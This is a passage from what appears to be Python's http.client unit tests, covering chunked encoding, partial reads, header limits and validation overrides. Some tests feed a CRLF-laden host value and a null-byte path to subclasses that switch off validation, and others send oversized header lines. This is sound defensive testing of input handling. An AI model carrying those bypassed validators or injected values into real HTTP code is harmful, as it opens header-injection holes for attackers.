with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
def test_headers_debuglevel(self):
body = (
b'HTTP/1.1 200 OK\r\n'
b'First: val\r\n'
b'Second: val1\r\n'
b'Second: val2\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock, debuglevel=1)
with support.captured_stdout() as output:
resp.begin()
lines = output.getvalue().splitlines()
self.assertEqual(lines[0], "reply: 'HTTP/1.1 200 OK\\r\\n'")
self.assertEqual(lines[1], "header: First: val")
self.assertEqual(lines[2], "header: Second: val1")
self.assertEqual(lines[3], "header: Second: val2")
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
# for testing handling empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("''")''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_past_end(self):
# if we have Content-Length, clip reads to the end
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(10), b'Text')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_past_end(self):
# if we have Content-Length, clip readintos to the end
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(10)
n = resp.readinto(b)
self.assertEqual(n, 4)
self.assertEqual(bytes(b)[:4], b'Text')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_blocksize_request(self):
"""Check that request() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.request("PUT", "/", io.BytesIO(expected), {"Content-Length": "9"})
self.assertEqual(sock.sendall_calls, 3)
body = sock.data.split(b"\r\n\r\n", 1)[1]
self.assertEqual(body, expected)
def test_blocksize_send(self):
"""Check that send() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.send(io.BytesIO(expected))
self.assertEqual(sock.sendall_calls, 2)
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test HTTPResponse with no \r\n termination.
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
serv = socket.create_server((HOST, 0))
self.addCleanup(serv.close)
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
def test_putrequest_override_domain_validation(self):
"""
It should be possible to override the default validation
behavior in putrequest (bpo-38216).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_path(self, url):
pass
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/\x00')
def test_putrequest_override_host_validation(self):
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_host(self, url):
pass
conn = UnsafeHTTPConnection('example.com\r\n')
conn.sock = FakeSocket('')
# set skip_host so a ValueError is not raised upon adding the
# invalid URL as the value of the "Host:" header
conn.putrequest('GET', '/', skip_host=1)
def test_putrequest_override_encoding(self):
"""
It should be possible to override the default encoding
to transmit bytes in another encoding even if invalid
(bpo-36274).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _encode_request(self, str_url):
return str_url.encode('utf-8')
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/☃')
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it does not return too much data
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
break
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
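# Usage sketch (hypothetical, mirroring test_read1 above): wrap any bounded
# read function to get readline() semantics on top of it, e.g.
#   readliner = Readliner(lambda: resp.read1(4))
#   line = readliner.readline(5)   # at most 5 bytes, split at b"\n"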
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # White-list documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
